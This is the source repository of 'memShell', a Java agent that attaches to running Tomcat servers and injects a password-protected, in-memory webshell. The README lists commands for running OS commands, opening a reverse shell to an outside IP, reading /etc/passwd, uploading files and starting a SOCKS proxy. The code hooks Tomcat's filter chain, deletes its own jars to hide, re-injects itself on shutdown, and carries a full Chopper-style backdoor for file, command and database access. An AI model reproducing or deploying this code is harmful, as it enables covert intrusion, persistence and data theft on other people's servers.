├── .classpath
├── .fatjar
├── .project
├── .settings
├── org.eclipse.jdt.core.prefs
└── org.eclipse.m2e.core.prefs
├── README.md
├── pom.xml
└── src
├── META-INF
└── MANIFEST.MF
├── net
└── rebeyond
│ └── memshell
│ ├── Agent.java
│ ├── Attach.java
│ ├── Evaluate.java
│ ├── Proxy.java
│ ├── Shell.java
│ ├── Transformer.java
│ └── redefine
│ ├── MyRequest.java
│ ├── MyResponse.java
│ ├── MyServletContext.java
│ ├── MyServletInputStream.java
│ ├── MyServletOutputStream.java
│ └── MySession.java
├── other
└── forcedelete.exe
└── source.txt
/.classpath:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
--------------------------------------------------------------------------------
/.fatjar:
--------------------------------------------------------------------------------
1 | #Fat Jar Configuration File
2 | #Wed May 23 12:38:25 CST 2018
3 | onejar.license.required=true
4 | manifest.classpath=
5 | manifest.removesigners=true
6 | onejar.checkbox=false
7 | jarname=E\:/agent.jar
8 | manifest.mergeall=true
9 | manifest.mainclass=Attach
10 | manifest.file=src\\META-INF\\MANIFEST.MF
11 | jarname.isextern=true
12 | onejar.expand=
13 | excludes=;;;;;;;;;;;;;;;;;;;;;
14 | includes=
15 |
--------------------------------------------------------------------------------
/.project:
--------------------------------------------------------------------------------
1 |
2 |
3 | memShell
4 |
5 |
6 |
7 |
8 |
9 | org.eclipse.jdt.core.javabuilder
10 |
11 |
12 |
13 |
14 | org.eclipse.m2e.core.maven2Builder
15 |
16 |
17 |
18 |
19 |
20 | org.eclipse.m2e.core.maven2Nature
21 | org.eclipse.jdt.core.javanature
22 |
23 |
24 |
--------------------------------------------------------------------------------
/.settings/org.eclipse.jdt.core.prefs:
--------------------------------------------------------------------------------
1 | eclipse.preferences.version=1
2 | org.eclipse.jdt.core.compiler.codegen.inlineJsrBytecode=enabled
3 | org.eclipse.jdt.core.compiler.codegen.targetPlatform=1.6
4 | org.eclipse.jdt.core.compiler.codegen.unusedLocal=preserve
5 | org.eclipse.jdt.core.compiler.compliance=1.6
6 | org.eclipse.jdt.core.compiler.debug.lineNumber=generate
7 | org.eclipse.jdt.core.compiler.debug.localVariable=generate
8 | org.eclipse.jdt.core.compiler.debug.sourceFile=generate
9 | org.eclipse.jdt.core.compiler.problem.assertIdentifier=error
10 | org.eclipse.jdt.core.compiler.problem.enumIdentifier=error
11 | org.eclipse.jdt.core.compiler.problem.forbiddenReference=warning
12 | org.eclipse.jdt.core.compiler.source=1.6
13 |
--------------------------------------------------------------------------------
/.settings/org.eclipse.m2e.core.prefs:
--------------------------------------------------------------------------------
1 | activeProfiles=
2 | eclipse.preferences.version=1
3 | resolveWorkspaceProjects=true
4 | version=1
5 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # memShell
2 | a webshell resides in the memory of java web server
3 |
4 | # install
5 | * unzip memShell.zip
6 | * cd memShell
7 | * java -jar inject.jar
8 | # usage
9 | * anyurl?pass_the_world=pass //show this help page.
10 | * anyurl?pass_the_world=pass&model=exec&cmd=whoami //run os command.
11 | * anyurl?pass_the_world=pass&model=connectback&ip=8.8.8.8&port=51 //reverse a shell back to 8.8.8.8 on port 51.
12 | * anyurl?pass_the_world=pass&model=urldownload&url=http://xxx.com/test.pdf&path=/tmp/test.pdf //download a remote file via the victim's network directly.
13 | * anyurl?pass_the_world=pass&model=list[del|show]&path=/etc/passwd //list,delete,show the specified path or file.
14 | * anyurl?pass_the_world=pass&model=download&path=/etc/passwd //download the specified file on the victim's disk.
15 | * anyurl?pass_the_world=pass&model=upload&path=/tmp/a.elf&content=this_is_content[&type=b] //upload a text file or a base64 encoded binary file to the victim's disk.
16 | * anyurl?pass_the_world=pass&model=proxy //start a socks proxy server on the victim.
17 | * anyurl?pass_the_world=pass&model=chopper //start a chopper server agent on the victim.
18 |
19 | **!!!It is recommended to use the POST method to submit data.**
20 |
21 | # note
22 | For learning exchanges only, do not use for illegal purposes.by rebeyond.
23 |
--------------------------------------------------------------------------------
/pom.xml:
--------------------------------------------------------------------------------
1 |
2 | 4.0.0
3 | ParaShell
4 | ParaShell
5 | 0.0.1-SNAPSHOT
6 |
7 | src
8 |
9 |
10 | maven-compiler-plugin
11 | 3.6.1
12 |
13 | 1.6
14 | 1.6
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | org.javassist
23 | javassist
24 | 3.22.0-GA
25 |
26 |
27 |
--------------------------------------------------------------------------------
/src/META-INF/MANIFEST.MF:
--------------------------------------------------------------------------------
1 | Manifest-Version: 1.0
2 | Agent-Class: net.rebeyond.memshell.Agent
3 | Can-Retransform-Classes: true
--------------------------------------------------------------------------------
/src/net/rebeyond/memshell/Agent.java:
--------------------------------------------------------------------------------
1 | package net.rebeyond.memshell;
2 | import java.io.BufferedReader;
3 | import java.io.File;
4 | import java.io.FileInputStream;
5 | import java.io.FileOutputStream;
6 | import java.io.InputStream;
7 | import java.io.InputStreamReader;
8 | import java.lang.instrument.Instrumentation;
9 | import java.lang.management.ManagementFactory;
10 | import java.lang.management.RuntimeMXBean;
11 | import java.net.HttpURLConnection;
12 | import java.net.InetAddress;
13 | import java.net.URL;
14 | import java.util.Arrays;
15 | import java.util.Set;
16 |
17 | import javax.management.MBeanServer;
18 | import javax.management.ObjectName;
19 | import javax.management.Query;
20 |
21 | public class Agent {
22 | public static String className = "org.apache.catalina.core.ApplicationFilterChain";
23 | public static byte[] injectFileBytes = new byte[] {}, agentFileBytes = new byte[] {};
24 | public static String currentPath;
25 | public static String password = "rebeyond";
26 |
27 | public static void agentmain(String agentArgs, Instrumentation inst) {
28 | inst.addTransformer(new Transformer(), true);
29 | if (agentArgs.indexOf("^") >= 0) {
30 | Agent.currentPath = agentArgs.split("\\^")[0];
31 | Agent.password = agentArgs.split("\\^")[1];
32 | } else {
33 | Agent.currentPath = agentArgs;
34 | }
35 | System.out.println("Agent Main Done");
36 | Class[] loadedClasses = inst.getAllLoadedClasses();
37 | for (Class c : loadedClasses) {
38 | if (c.getName().equals(className)) {
39 | try {
40 | inst.retransformClasses(c);
41 | } catch (Exception e) {
42 | // TODO Auto-generated catch block
43 | e.printStackTrace();
44 | }
45 | }
46 | }
47 |
48 | try {
49 | initLoad();
50 | readInjectFile(Agent.currentPath);
51 | readAgentFile(Agent.currentPath);
52 | clear(Agent.currentPath);
53 | } catch (Exception e) {
54 | // 为了隐蔽,不要打印异常信息
55 | }
56 | Agent.persist();
57 | }
58 |
59 | public static void persist() {
60 | try {
61 | Thread t = new Thread() {
62 | public void run() {
63 | try {
64 | writeFiles("inject.jar", Agent.injectFileBytes);
65 | writeFiles("agent.jar", Agent.agentFileBytes);
66 | startInject();
67 | } catch (Exception e) {
68 |
69 | }
70 | }
71 | };
72 | t.setName("shutdown Thread");
73 | Runtime.getRuntime().addShutdownHook(t);
74 | } catch (Throwable t) {
75 |
76 | }
77 | }
78 |
79 | public static void writeFiles(String fileName, byte[] data) throws Exception {
80 | String tempFolder = System.getProperty("java.io.tmpdir");
81 | FileOutputStream fso = new FileOutputStream(tempFolder + File.separator + fileName);
82 | fso.write(data);
83 | fso.close();
84 | }
85 |
86 | public static void readInjectFile(String filePath) throws Exception {
87 | String fileName = "inject.jar";
88 | File f = new File(filePath + File.separator + fileName);
89 | if (!f.exists()) {
90 | f = new File(System.getProperty("java.io.tmpdir") + File.separator + fileName);
91 | }
92 | InputStream is = new FileInputStream(f);
93 | byte[] bytes = new byte[1024 * 100];
94 | int num = 0;
95 | while ((num = is.read(bytes)) != -1) {
96 | injectFileBytes = mergeByteArray(injectFileBytes, Arrays.copyOfRange(bytes, 0, num));
97 | }
98 | is.close();
99 | }
100 |
101 | public static void readAgentFile(String filePath) throws Exception {
102 | String fileName = "agent.jar";
103 | File f = new File(filePath + File.separator + fileName);
104 | if (!f.exists()) {
105 | f = new File(System.getProperty("java.io.tmpdir") + File.separator + fileName);
106 | }
107 | InputStream is = new FileInputStream(f);
108 | byte[] bytes = new byte[1024 * 100];
109 | int num = 0;
110 | while ((num = is.read(bytes)) != -1) {
111 | agentFileBytes = mergeByteArray(agentFileBytes, Arrays.copyOfRange(bytes, 0, num));
112 | }
113 | is.close();
114 | }
115 |
116 | public static void startInject() throws Exception {
117 | Thread.sleep(2000);
118 | String tempFolder = System.getProperty("java.io.tmpdir");
119 | String cmd = "java -jar " + tempFolder + File.separator + "inject.jar " + Agent.password;
120 | Runtime.getRuntime().exec(cmd);
121 | }
122 |
123 | public static void main(String[] args) {
124 | try {
125 | readAgentFile("e:/");
126 | String tempPath = Attach.class.getProtectionDomain().getCodeSource().getLocation().getPath();
127 |
128 | String agentFile = Attach.class.getProtectionDomain().getCodeSource().getLocation().getPath().substring(0,
129 | tempPath.lastIndexOf("/"));
130 | } catch (Exception e) {
131 | // TODO Auto-generated catch block
132 | e.printStackTrace();
133 | }
134 | }
135 |
136 | static byte[] mergeByteArray(byte[]... byteArray) {
137 | int totalLength = 0;
138 | for (int i = 0; i < byteArray.length; i++) {
139 | if (byteArray[i] == null) {
140 | continue;
141 | }
142 | totalLength += byteArray[i].length;
143 | }
144 |
145 | byte[] result = new byte[totalLength];
146 | int cur = 0;
147 | for (int i = 0; i < byteArray.length; i++) {
148 | if (byteArray[i] == null) {
149 | continue;
150 | }
151 | System.arraycopy(byteArray[i], 0, result, cur, byteArray[i].length);
152 | cur += byteArray[i].length;
153 | }
154 |
155 | return result;
156 | }
157 |
158 | public static void clear(String currentPath) throws Exception {
159 | Thread clearThread = new Thread() {
160 | String currentPath = Agent.currentPath;
161 |
162 | public void run() {
163 | try {
164 | Thread.sleep(5000);
165 | String injectFile = currentPath + "inject.jar";
166 | String agentFile = currentPath + "agent.jar";
167 | new File(injectFile).getCanonicalFile().delete();
168 | String OS = System.getProperty("os.name").toLowerCase();
169 | if (OS.indexOf("windows") >= 0) {
170 | try {
171 | unlockFile(currentPath);
172 | } catch (Exception e) {
173 | e.printStackTrace();
174 | }
175 | }
176 | new File(agentFile).delete();
177 | } catch (Exception e) {
178 | //pass
179 | }
180 | }
181 | };
182 | clearThread.start();
183 |
184 | }
185 |
186 | public static void unlockFile(String currentPath) throws Exception {
187 | String exePath = currentPath + "foreceDelete.exe";
188 | InputStream is = Agent.class.getClassLoader().getResourceAsStream("other/forcedelete.exe");
189 | FileOutputStream fos = new FileOutputStream(new File(exePath).getCanonicalPath());
190 | byte[] bytes = new byte[1024 * 100];
191 | int num = 0;
192 | while ((num = is.read(bytes)) != -1) {
193 | fos.write(bytes, 0, num);
194 | fos.flush();
195 | }
196 | fos.close();
197 | is.close();
198 | Process process = java.lang.Runtime.getRuntime().exec(exePath + " " + getCurrentPid());
199 | try {
200 | process.waitFor();
201 | } catch (InterruptedException e) {
202 | // TODO Auto-generated catch block
203 | e.printStackTrace();
204 | }
205 | new File(exePath).delete();
206 | }
207 |
208 | public static String getCurrentPid() {
209 | RuntimeMXBean runtimeMXBean = ManagementFactory.getRuntimeMXBean();
210 | return runtimeMXBean.getName().split("@")[0];
211 | }
212 |
213 | public static void initLoad() throws Exception {
214 | try {
215 | MBeanServer beanServer = ManagementFactory.getPlatformMBeanServer();
216 | Set objectNames = beanServer.queryNames(new ObjectName("*:type=Connector,*"),
217 | Query.match(Query.attr("protocol"), Query.value("HTTP/1.1")));
218 | //String host = InetAddress.getLocalHost().getHostAddress();
219 | String host = "127.0.0.1";
220 | String port = objectNames.iterator().next().getKeyProperty("port");
221 | String url = "http" + "://" + host + ":" + port;
222 | String[] models = new String[] { "model=exec&cmd=whoami", "model=proxy", "model=chopper", "model=list&path=.",
223 | "model=urldownload&url=https://www.baidu.com/robots.txt&path=not_exist:/not_exist" };
224 | for (String model : models) {
225 | String address = url + "/robots.txt?" + "pass_the_world=" + Agent.password + "&" + model;
226 | openUrl(address);
227 | }
228 | }
229 | catch(Exception e)
230 | {
231 | //pass
232 | }
233 | }
234 |
235 | public static void openUrl(String address) throws Exception {
236 | URL url = new URL(address);
237 | HttpURLConnection urlcon = (HttpURLConnection) url.openConnection();
238 | urlcon.connect(); // 获取连接
239 | InputStream is = urlcon.getInputStream();
240 | BufferedReader buffer = new BufferedReader(new InputStreamReader(is));
241 | StringBuffer bs = new StringBuffer();
242 | String l = null;
243 | while ((l = buffer.readLine()) != null) {
244 | bs.append(l).append("\n");
245 | }
246 | }
247 | }
248 |
--------------------------------------------------------------------------------
/src/net/rebeyond/memshell/Attach.java:
--------------------------------------------------------------------------------
1 | package net.rebeyond.memshell;
2 |
3 | import java.io.File;
4 | import java.util.Iterator;
5 | import java.util.List;
6 | import java.util.Map.Entry;
7 | import java.util.Properties;
8 |
9 | import com.sun.tools.attach.VirtualMachine;
10 | import com.sun.tools.attach.VirtualMachineDescriptor;
11 |
12 | public class Attach {
13 |
14 | public static void main(String[] args) throws Exception {
15 |
16 | if (args.length != 1) {
17 | System.out.println("Usage:java -jar inject.jar password");
18 | return;
19 | }
20 | VirtualMachine vm = null;
21 | List vmList = null;
22 | String password = args[0];
23 | String currentPath = Attach.class.getProtectionDomain().getCodeSource().getLocation().getPath();
24 | currentPath = currentPath.substring(0, currentPath.lastIndexOf("/") + 1);
25 | String agentFile = currentPath + "agent.jar";
26 | agentFile = new File(agentFile).getCanonicalPath();
27 | String agentArgs = currentPath;
28 | if (!password.equals("") || password != null) {
29 | agentArgs = agentArgs + "^" + password;
30 | }
31 |
32 | while (true) {
33 | try {
34 | vmList = VirtualMachine.list();
35 | if (vmList.size() <= 0)
36 | continue;
37 | for (VirtualMachineDescriptor vmd : vmList) {
38 | if (vmd.displayName().indexOf("catalina") >= 0||vmd.displayName().equals("")) {
39 | vm = VirtualMachine.attach(vmd);
40 |
41 | //ADD for tomcat windows service,dispayname is blank string and has key "catalina.home".
42 | if (vmd.displayName().equals("")&&vm.getSystemProperties().containsKey("catalina.home")==false)
43 | continue;
44 |
45 | System.out.println("[+]OK.i find a jvm.");
46 | Thread.sleep(1000);
47 | if (null != vm) {
48 | vm.loadAgent(agentFile, agentArgs);
49 | System.out.println("[+]memeShell is injected.");
50 | vm.detach();
51 | return;
52 | }
53 | }
54 | }
55 | Thread.sleep(3000);
56 | } catch (Exception e) {
57 | e.printStackTrace();
58 | }
59 | }
60 | }
61 | }
--------------------------------------------------------------------------------
/src/net/rebeyond/memshell/Evaluate.java:
--------------------------------------------------------------------------------
1 | package net.rebeyond.memshell;
2 |
3 |
4 | import java.io.BufferedInputStream;
5 | import java.io.BufferedReader;
6 | import java.io.BufferedWriter;
7 | import java.io.File;
8 | import java.io.FileInputStream;
9 | import java.io.FileOutputStream;
10 | import java.io.IOException;
11 | import java.io.InputStream;
12 | import java.io.InputStreamReader;
13 | import java.io.OutputStreamWriter;
14 | import java.io.PrintWriter;
15 | import java.net.HttpURLConnection;
16 | import java.net.URL;
17 | import java.sql.Connection;
18 | import java.sql.DriverManager;
19 | import java.sql.ResultSet;
20 | import java.sql.ResultSetMetaData;
21 | import java.sql.Statement;
22 | import java.text.SimpleDateFormat;
23 |
24 |
25 | import javax.servlet.ServletOutputStream;
26 | import javax.servlet.ServletRequest;
27 | import javax.servlet.ServletResponse;
28 |
29 | import net.rebeyond.memshell.redefine.MyRequest;
30 | import net.rebeyond.memshell.redefine.MyResponse;
31 | import net.rebeyond.memshell.redefine.MyServletContext;
32 | import net.rebeyond.memshell.redefine.MyServletOutputStream;
33 |
34 | public class Evaluate {
35 |
36 | private static final long serialVersionUID = 1L;
37 |
38 | String Pwd = "023";
39 | String cs = "UTF-8";
40 |
41 | String EC(String s) throws Exception {
42 | return new String(s.getBytes("ISO-8859-1"),cs);
43 | }
44 |
45 | Connection GC(String s) throws Exception {
46 | String[] x = s.trim().split("\r\n");
47 | Class.forName(x[0].trim());
48 | if(x[1].indexOf("jdbc:oracle")!=-1){
49 | return DriverManager.getConnection(x[1].trim()+":"+x[4],x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]);
50 | }else{
51 | Connection c = DriverManager.getConnection(x[1].trim(),x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]);
52 | if (x.length > 4) {
53 | c.setCatalog(x[4]);
54 | }
55 | return c;
56 | }
57 | }
58 |
59 | void AA(StringBuffer sb) throws Exception {
60 | File r[] = File.listRoots();
61 | for (int i = 0; i < r.length; i++) {
62 | sb.append(r[i].toString().substring(0, 2));
63 | }
64 | }
65 |
66 | void BB(String s, StringBuffer sb) throws Exception {
67 | File oF = new File(s), l[] = oF.listFiles();
68 | String sT, sQ, sF = "";
69 | java.util.Date dt;
70 | SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
71 | for (int i = 0; i < l.length; i++) {
72 | dt = new java.util.Date(l[i].lastModified());
73 | sT = fm.format(dt);
74 | sQ = l[i].canRead() ? "R" : "";
75 | sQ += l[i].canWrite() ? " W" : "";
76 | if (l[i].isDirectory()) {
77 | sb.append(l[i].getName() + "/\t" + sT + "\t" + l[i].length()+ "\t" + sQ + "\n");
78 | } else {
79 | sF+=l[i].getName() + "\t" + sT + "\t" + l[i].length() + "\t"+ sQ + "\n";
80 | }
81 | }
82 | sb.append(sF);
83 | }
84 |
85 | void EE(String s) throws Exception {
86 | File f = new File(s);
87 | if (f.isDirectory()) {
88 | File x[] = f.listFiles();
89 | for (int k = 0; k < x.length; k++) {
90 | if (!x[k].delete()) {
91 | EE(x[k].getPath());
92 | }
93 | }
94 | }
95 | f.delete();
96 | }
97 |
98 | void FF(String s, ServletResponse r) throws Exception {
99 | int n;
100 | byte[] b = new byte[512];
101 | //r.reset();
102 | MyResponse.reset(r);
103 | //ServletOutputStream os = r.getOutputStream();
104 | Object os = MyResponse.getOutputStream(r);
105 | BufferedInputStream is = new BufferedInputStream(new FileInputStream(s));
106 | //os.write(("->" + "|").getBytes(), 0, 3);
107 | MyServletOutputStream.write(os,("->" + "|").getBytes(), 0, 3);
108 | while ((n = is.read(b, 0, 512)) != -1) {
109 | MyServletOutputStream.write(os,b, 0, n);
110 | }
111 | MyServletOutputStream.write(os,("|" + "<-").getBytes(), 0, 3);
112 | //os.close();
113 | MyServletOutputStream.close(os);
114 | is.close();
115 | }
116 |
117 | void GG(String s, String d) throws Exception {
118 | String h = "0123456789ABCDEF";
119 | File f = new File(s);
120 | f.createNewFile();
121 | FileOutputStream os = new FileOutputStream(f);
122 | for (int i = 0; i < d.length(); i += 2) {
123 | os.write((h.indexOf(d.charAt(i)) << 4 | h.indexOf(d.charAt(i + 1))));
124 | }
125 | os.close();
126 | }
127 |
128 | void HH(String s, String d) throws Exception {
129 | File sf = new File(s), df = new File(d);
130 | if (sf.isDirectory()) {
131 | if (!df.exists()) {
132 | df.mkdir();
133 | }
134 | File z[] = sf.listFiles();
135 | for (int j = 0; j < z.length; j++) {
136 | HH(s + "/" + z[j].getName(), d + "/" + z[j].getName());
137 | }
138 | } else {
139 | FileInputStream is = new FileInputStream(sf);
140 | FileOutputStream os = new FileOutputStream(df);
141 | int n;
142 | byte[] b = new byte[512];
143 | while ((n = is.read(b, 0, 512)) != -1) {
144 | os.write(b, 0, n);
145 | }
146 | is.close();
147 | os.close();
148 | }
149 | }
150 |
151 | void II(String s, String d) throws Exception {
152 | File sf = new File(s), df = new File(d);
153 | sf.renameTo(df);
154 | }
155 |
156 | void JJ(String s) throws Exception {
157 | File f = new File(s);
158 | f.mkdir();
159 | }
160 |
161 | void KK(String s, String t) throws Exception {
162 | File f = new File(s);
163 | SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
164 | java.util.Date dt = fm.parse(t);
165 | f.setLastModified(dt.getTime());
166 | }
167 |
168 | void LL(String s, String d) throws Exception {
169 | URL u = new URL(s);
170 | int n = 0;
171 | FileOutputStream os = new FileOutputStream(d);
172 | HttpURLConnection h = (HttpURLConnection) u.openConnection();
173 | InputStream is = h.getInputStream();
174 | byte[] b = new byte[512];
175 | while ((n = is.read(b)) != -1) {
176 | os.write(b, 0, n);
177 | }
178 | os.close();
179 | is.close();
180 | h.disconnect();
181 | }
182 |
183 | void MM(InputStream is, StringBuffer sb) throws Exception {
184 | String l;
185 | BufferedReader br = new BufferedReader(new InputStreamReader(is));
186 | while ((l = br.readLine()) != null) {
187 | sb.append(l + "\r\n");
188 | }
189 | }
190 |
191 | void NN(String s, StringBuffer sb) throws Exception {
192 | Connection c = GC(s);
193 | ResultSet r = s.indexOf("jdbc:oracle")!=-1?c.getMetaData().getSchemas():c.getMetaData().getCatalogs();
194 | while (r.next()) {
195 | sb.append(r.getString(1) + "\t");
196 | }
197 | r.close();
198 | c.close();
199 | }
200 |
201 | void OO(String s, StringBuffer sb) throws Exception {
202 | Connection c = GC(s);
203 | String[] x = s.trim().split("\r\n");
204 | ResultSet r = c.getMetaData().getTables(null,s.indexOf("jdbc:oracle")!=-1?x.length>5?x[5]:x[4]:null, "%", new String[]{"TABLE"});
205 | while (r.next()) {
206 | sb.append(r.getString("TABLE_NAME") + "\t");
207 | }
208 | r.close();
209 | c.close();
210 | }
211 |
212 | void PP(String s, StringBuffer sb) throws Exception {
213 | String[] x = s.trim().split("\r\n");
214 | Connection c = GC(s);
215 | Statement m = c.createStatement(1005, 1007);
216 | ResultSet r = m.executeQuery("select * from " + x[x.length-1]);
217 | ResultSetMetaData d = r.getMetaData();
218 | for (int i = 1; i <= d.getColumnCount(); i++) {
219 | sb.append(d.getColumnName(i) + " (" + d.getColumnTypeName(i)+ ")\t");
220 | }
221 | r.close();
222 | m.close();
223 | c.close();
224 | }
225 |
226 | void QQ(String cs, String s, String q, StringBuffer sb,String p) throws Exception {
227 | Connection c = GC(s);
228 | Statement m = c.createStatement(1005, 1008);
229 | BufferedWriter bw = null;
230 | try {
231 | ResultSet r = m.executeQuery(q.indexOf("--f:")!=-1?q.substring(0,q.indexOf("--f:")):q);
232 | ResultSetMetaData d = r.getMetaData();
233 | int n = d.getColumnCount();
234 | for (int i = 1; i <= n; i++) {
235 | sb.append(d.getColumnName(i) + "\t|\t");
236 | }
237 | sb.append("\r\n");
238 | if(q.indexOf("--f:")!=-1){
239 | File file = new File(p);
240 | if(q.indexOf("-to:")==-1){
241 | file.mkdir();
242 | }
243 | bw = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(q.indexOf("-to:")!=-1?p.trim():p+q.substring(q.indexOf("--f:") + 4,q.length()).trim()),true),cs));
244 | }
245 | while (r.next()) {
246 | for (int i = 1; i <= n; i++) {
247 | if(q.indexOf("--f:")!=-1){
248 | bw.write(r.getObject(i)+""+"\t");
249 | bw.flush();
250 | }else{
251 | sb.append(r.getObject(i)+"" + "\t|\t");
252 | }
253 | }
254 | if(bw!=null){bw.newLine();}
255 | sb.append("\r\n");
256 | }
257 | r.close();
258 | if(bw!=null){bw.close();}
259 | } catch (Exception e) {
260 | sb.append("Result\t|\t\r\n");
261 | try {
262 | m.executeUpdate(q);
263 | sb.append("Execute Successfully!\t|\t\r\n");
264 | } catch (Exception ee) {
265 | sb.append(ee.toString() + "\t|\t\r\n");
266 | }
267 | }
268 | m.close();
269 | c.close();
270 | }
271 |
272 | public void doGet(ServletRequest request, ServletResponse response)
273 | throws Exception {
274 | doPost(request, response);
275 | }
276 |
277 | public void doPost(ServletRequest request, ServletResponse response)throws Exception {
278 | //cs = request.getParameter("z0") != null ? request.getParameter("z0")+ "":cs;
279 | cs = MyRequest.getParameter(request, "z0") != null ? MyRequest.getParameter(request, "z0") + "":cs;
280 | //response.setContentType("text/html");
281 | //response.setCharacterEncoding(cs);
282 | MyResponse.setContentType(response, "text/html");
283 | MyResponse.setCharacterEncoding(response,cs);
284 | PrintWriter out = MyResponse.getWriter(response);
285 | StringBuffer sb = new StringBuffer("");
286 | try {
287 | String Z = EC(MyRequest.getParameter(request, Pwd) + "");
288 | String z1 = EC(MyRequest.getParameter(request, "z1") + "");
289 | String z2 = EC(MyRequest.getParameter(request, "z2") + "");
290 | sb.append("->" + "|");
291 | Object obj=MyRequest.getServletContext(request);
292 | String s =MyServletContext.getRealPath(obj,"/");
293 | if (Z.equals("A")) {
294 | sb.append(s + "\t");
295 | if (!s.substring(0, 1).equals("/")) {
296 | AA(sb);
297 | }
298 | } else if (Z.equals("B")) {
299 | BB(z1, sb);
300 | } else if (Z.equals("C")) {
301 | String l = "";
302 | BufferedReader br = new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));
303 | while ((l = br.readLine()) != null) {
304 | sb.append(l + "\r\n");
305 | }
306 | br.close();
307 | } else if (Z.equals("D")) {
308 | BufferedWriter bw = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));
309 | bw.write(z2);
310 | bw.close();
311 | sb.append("1");
312 | } else if (Z.equals("E")) {
313 | EE(z1);
314 | sb.append("1");
315 | } else if (Z.equals("F")) {
316 | FF(z1, response);
317 | } else if (Z.equals("G")) {
318 | GG(z1, z2);
319 | sb.append("1");
320 | } else if (Z.equals("H")) {
321 | HH(z1, z2);
322 | sb.append("1");
323 | } else if (Z.equals("I")) {
324 | II(z1, z2);
325 | sb.append("1");
326 | } else if (Z.equals("J")) {
327 | JJ(z1);
328 | sb.append("1");
329 | } else if (Z.equals("K")) {
330 | KK(z1, z2);
331 | sb.append("1");
332 | } else if (Z.equals("L")) {
333 | LL(z1, z2);
334 | sb.append("1");
335 | } else if (Z.equals("M")) {
336 | String[] c = { z1.substring(2), z1.substring(0, 2), z2 };
337 | Process p = Runtime.getRuntime().exec(c);
338 | MM(p.getInputStream(), sb);
339 | MM(p.getErrorStream(), sb);
340 | } else if (Z.equals("N")) {
341 | NN(z1, sb);
342 | } else if (Z.equals("O")) {
343 | OO(z1, sb);
344 | } else if (Z.equals("P")) {
345 | PP(z1, sb);
346 | } else if (Z.equals("Q")) {
347 | QQ(cs, z1, z2, sb,z2.indexOf("-to:")!=-1?z2.substring(z2.indexOf("-to:")+4,z2.length()):s.replaceAll("\\\\", "/")+"images/");
348 | }
349 | } catch (Exception e) {
350 | sb.append("ERROR" + ":// " + e.toString());
351 | }
352 | sb.append("|" + "<-");
353 | out.print(sb.toString());
354 | }
355 |
356 | }
--------------------------------------------------------------------------------
/src/net/rebeyond/memshell/Proxy.java:
--------------------------------------------------------------------------------
1 | package net.rebeyond.memshell;
2 | import java.io.IOException;
3 | import java.net.InetSocketAddress;
4 | import java.net.UnknownHostException;
5 | import java.nio.ByteBuffer;
6 | import java.nio.channels.SocketChannel;
7 |
8 | import net.rebeyond.memshell.redefine.MyRequest;
9 | import net.rebeyond.memshell.redefine.MyResponse;
10 | import net.rebeyond.memshell.redefine.MyServletInputStream;
11 | import net.rebeyond.memshell.redefine.MyServletOutputStream;
12 | import net.rebeyond.memshell.redefine.MySession;
13 |
14 | public class Proxy {
15 | public void doProxy(Object request, Object response) throws Exception {
16 | Object httpSession = MyRequest.getSession(request);
17 | String cmd = MyRequest.getHeader(request, "X-CMD");
18 | if (cmd != null) {
19 | MyResponse.setHeader(response, "X-STATUS", "OK");
20 | if (cmd.compareTo("CONNECT") == 0) {
21 | try {
22 | String target = MyRequest.getHeader(request, "X-TARGET");
23 | int port = Integer.parseInt(MyRequest.getHeader(request, "X-PORT"));
24 | SocketChannel socketChannel = SocketChannel.open();
25 | socketChannel.connect(new InetSocketAddress(target, port));
26 | socketChannel.configureBlocking(false);
27 | MySession.setAttribute(httpSession, "socket", socketChannel);
28 | MyResponse.setHeader(response, "X-STATUS", "OK");
29 | } catch (UnknownHostException e) {
30 | System.out.println(e.getMessage());
31 | MyResponse.setHeader(response, "X-ERROR", e.getMessage());
32 | MyResponse.setHeader(response, "X-STATUS", "FAIL");
33 | } catch (IOException e) {
34 | System.out.println(e.getMessage());
35 | MyResponse.setHeader(response, "X-ERROR", e.getMessage());
36 | MyResponse.setHeader(response, "X-STATUS", "FAIL");
37 |
38 | }
39 | } else if (cmd.compareTo("DISCONNECT") == 0) {
40 | SocketChannel socketChannel = (SocketChannel) MySession.getAttribute(httpSession, "socket");
41 | try {
42 | socketChannel.socket().close();
43 | } catch (Exception ex) {
44 | System.out.println(ex.getMessage());
45 | }
46 | MySession.invalidate(httpSession);
47 | } else if (cmd.compareTo("READ") == 0) {
48 | SocketChannel socketChannel = (SocketChannel) MySession.getAttribute(httpSession, "socket");
49 | try {
50 | ByteBuffer buf = ByteBuffer.allocate(512);
51 | int bytesRead = socketChannel.read(buf);
52 | // ServletOutputStream so = response.getOutputStream();
53 | Object so = MyResponse.getOutputStream(response);
54 | while (bytesRead > 0) {
55 | // so.write(buf.array(),0,bytesRead);
56 | // so.flush();
57 | MyServletOutputStream.write(so, buf.array(), 0, bytesRead);
58 | MyServletOutputStream.flush(so);
59 | buf.clear();
60 | bytesRead = socketChannel.read(buf);
61 | }
62 | // response.setHeader("X-STATUS", "OK");
63 | MyResponse.setHeader(response, "X-STATUS", "OK");
64 | // so.flush();
65 | // so.close();
66 | MyServletOutputStream.flush(so);
67 | MyServletOutputStream.close(so);
68 |
69 | } catch (Exception e) {
70 | System.out.println(e.getMessage());
71 | MyResponse.setHeader(response, "X-ERROR", e.getMessage());
72 | MyResponse.setHeader(response, "X-STATUS", "FAIL");
73 | // socketChannel.socket().close();
74 | }
75 |
76 | } else if (cmd.compareTo("FORWARD") == 0) {
77 | SocketChannel socketChannel = (SocketChannel) MySession.getAttribute(httpSession, "socket");
78 | try {
79 |
80 | int readlen = MyRequest.getContentLength(request);
81 | byte[] buff = new byte[readlen];
82 | // request.getInputStream().read(buff, 0, readlen);
83 | Object ins = MyRequest.getInputStream(request);
